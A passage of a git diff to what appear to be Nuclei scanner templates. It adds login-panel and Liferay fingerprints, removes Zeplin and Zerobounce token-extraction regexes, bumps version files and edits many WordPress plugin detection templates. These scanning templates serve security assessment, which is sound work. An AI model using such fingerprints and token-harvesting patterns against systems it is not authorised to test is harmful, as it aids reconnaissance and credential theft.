|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'title="atlantis'
|
||||
- 'Lock'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: kanboard-login
|
||||
|
||||
info:
|
||||
name: Kanboard Login Panel
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: A Kanboard login panel was detected.
|
||||
classification:
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:2056442365
|
||||
tags: panel,kanboard
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '/?controller=UserAjaxController&action=status'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,20 +0,0 @@
|
|||
id: zeplin-access-token
|
||||
info:
|
||||
name: Zeplin Access Token
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
reference:
|
||||
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zeplin/zeplin.go
|
||||
- https://app.zeplin.io/profile/developer
|
||||
tags: exposure,token,zeplin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '([a-zA-Z0-9-.]{350,400})'
|
|
@ -1,21 +0,0 @@
|
|||
id: zerobounce-api-token
|
||||
|
||||
info:
|
||||
name: Zerobounce API Token
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
reference:
|
||||
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go
|
||||
- https://www.zerobounce.net/docs/email-validation-api-quickstart
|
||||
tags: exposure,token,zerobounce,api
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '([a-z0-9]{32})'
|
|
@ -1 +1 @@
|
|||
2.7.22
|
||||
2.7.23
|
|
@ -1 +1 @@
|
|||
3.8
|
||||
4.1
|
|
@ -1 +1 @@
|
|||
7.68
|
||||
7.69
|
|
@ -1 +1 @@
|
|||
3.1.20
|
||||
3.1.21
|
|
@ -1 +1 @@
|
|||
2.25.4
|
||||
2.25.5
|
|
@ -1 +1 @@
|
|||
6.3.6.1
|
||||
6.3.9
|
|
@ -1 +1 @@
|
|||
5.7.1
|
||||
5.7.2
|
|
@ -1 +1 @@
|
|||
1.13.3
|
||||
1.13.4
|
|
@ -1 +1 @@
|
|||
4.4.9
|
||||
4.5
|
|
@ -1 +1 @@
|
|||
1.5.2
|
||||
1.5.3
|
|
@ -1 +1 @@
|
|||
3.9.1
|
||||
3.9.2
|
|
@ -1 +1 @@
|
|||
5.5.1
|
||||
5.5.2
|
|
@ -1 +1 @@
|
|||
4.3.1
|
||||
4.3.2
|
|
@ -1 +1 @@
|
|||
1.21.0
|
||||
1.22.1
|
|
@ -1 +1 @@
|
|||
2.3.3
|
||||
2.3.5
|
|
@ -1 +1 @@
|
|||
1.89.0
|
||||
1.90.1
|
|
@ -1 +1 @@
|
|||
14.7.3
|
||||
14.8.3
|
|
@ -1 +1 @@
|
|||
9.2.12
|
||||
9.2.81
|
|
@ -1 +1 @@
|
|||
4.2.0
|
||||
4.3.0
|
|
@ -1 +1 @@
|
|||
5.6.14
|
||||
5.6.15
|
|
@ -1 +1 @@
|
|||
3.28.0
|
||||
3.28.2
|
|
@ -1 +1 @@
|
|||
1.8.5
|
||||
1.8.8
|
|
@ -1 +1 @@
|
|||
2.2.1
|
||||
2.2.3
|
|
@ -1 +1 @@
|
|||
4.9.44
|
||||
4.9.45
|
|
@ -1 +1 @@
|
|||
6.0.12
|
||||
6.0.14
|
|
@ -1 +1 @@
|
|||
1.0.103.1
|
||||
1.0.105
|
|
@ -1 +1 @@
|
|||
1.45.0
|
||||
1.46.0
|
|
@ -1 +1 @@
|
|||
1.14
|
||||
2.0.1
|
|
@ -1 +1 @@
|
|||
2.4.3
|
||||
2.4.4
|
|
@ -1 +1 @@
|
|||
2.1.1
|
||||
2.2.0
|
|
@ -1 +1 @@
|
|||
5.5.1
|
||||
5.6.1
|
|
@ -1 +1 @@
|
|||
5.1.2
|
||||
5.2.0
|
|
@ -1 +1 @@
|
|||
7.2.0
|
||||
7.2.2
|
|
@ -1 +1 @@
|
|||
19.12
|
||||
19.13
|
|
@ -1 +1 @@
|
|||
13.2.8
|
||||
13.2.10
|
|
@ -1 +1 @@
|
|||
4.4.1
|
||||
4.5.1
|
|
@ -2,7 +2,7 @@ id: exposed-dockerd
|
|||
|
||||
info:
|
||||
name: Docker Daemon Exposed
|
||||
author: arafat
|
||||
author: arafatansari
|
||||
severity: critical
|
||||
description: |
|
||||
Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
|
||||
|
|
|
@ -2640,3 +2640,8 @@ requests:
|
|||
name: "Leica RefWorx"
|
||||
dsl:
|
||||
- "status_code==200 && (\"-1054477011\" == mmh3(base64_py(body)))"
|
||||
|
||||
- type: dsl
|
||||
name: "Liferay"
|
||||
dsl:
|
||||
- "status_code==200 && (\"-2024949122\" == mmh3(base64_py(body)))"
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/akismet/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/amp/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt"
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: wordpress-duplicator
|
||||
|
||||
info:
|
||||
name: Duplicator – WordPress Migration Plugin Detection
|
||||
name: Duplicator – WordPress Migration & Backup Plugin Detection
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt"
|
||||
|
||||
|
|